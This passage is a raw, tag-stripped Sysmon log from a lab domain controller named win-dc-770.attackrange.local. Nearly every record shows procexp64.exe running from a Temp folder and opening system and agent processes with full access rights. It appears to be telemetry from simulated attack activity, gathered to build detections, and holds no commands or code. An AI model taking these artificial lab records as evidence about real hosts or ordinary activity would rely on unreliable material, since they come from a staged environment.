Explorer\iexplore.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784531Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:39.003{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A401-00000000A301}5528C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784530Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:39.003{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A101-00000000A301}5376C:\Windows\System32\rdpclip.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784529Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:39.003{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E0-600B-9701-00000000A301}2256C:\Windows\system32\dwm.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784528Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:39.003{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17DF-600B-9501-00000000A301}1036C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784527Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:39.003{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17DF-600B-9401-00000000A301}5084C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784526Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:39.003{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A8-600B-E200-00000000A301}4204C:\Windows\System32\msdtc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784525Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:39.003{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A1-600B-DF00-00000000A301}3152C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784524Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:39.003{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-159B-600B-D600-00000000A301}2808C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784523Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:39.003{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-AC00-00000000A301}4656C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784522Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:39.003{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-A800-00000000A301}2616C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784521Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:39.003{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152F-600B-5900-00000000A301}3940C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784520Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:39.003{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152E-600B-5500-00000000A301}3732C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784519Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:39.003{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3500-00000000A301}3300C:\Windows\System32\vds.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784518Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:39.003{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3300-00000000A301}3092C:\Windows\system32\wbem\unsecapp.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784517Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:39.003{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3200-00000000A301}2008C:\Windows\system32\dfssvc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784516Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:39.003{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784515Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:39.003{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3000-00000000A301}2232C:\Windows\System32\ismserv.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784514Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:39.003{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2F00-00000000A301}2884C:\Windows\system32\dns.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784513Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:39.003{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2E00-00000000A301}2440C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784512Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:39.003{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2C00-00000000A301}2760C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784511Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:39.003{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2B00-00000000A301}2704C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784510Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:39.003{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2A00-00000000A301}2740C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784509Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:39.003{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2900-00000000A301}2724C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784508Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:39.003{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2800-00000000A301}1980C:\Windows\System32\spoolsv.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784507Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:39.003{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1523-600B-2600-00000000A301}3012C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784506Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:39.003{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2400-00000000A301}2896C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784505Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:39.003{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2300-00000000A301}2888C:\Users\Public\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784504Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:39.003{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151B-600B-2100-00000000A301}2328C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784503Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:39.003{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1700-00000000A301}1636C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784502Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:39.003{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1600-00000000A301}1528C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784501Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:39.003{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1500-00000000A301}1480C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784500Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:39.003{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1400-00000000A301}1276C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784499Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:39.003{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1300-00000000A301}1200C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784498Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:39.003{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1200-00000000A301}1192C:\Windows\system32\dwm.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784497Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:39.003{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1100-00000000A301}1160C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784496Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:39.003{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1000-00000000A301}1152C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784495Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:39.003{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0F00-00000000A301}1120C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784494Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 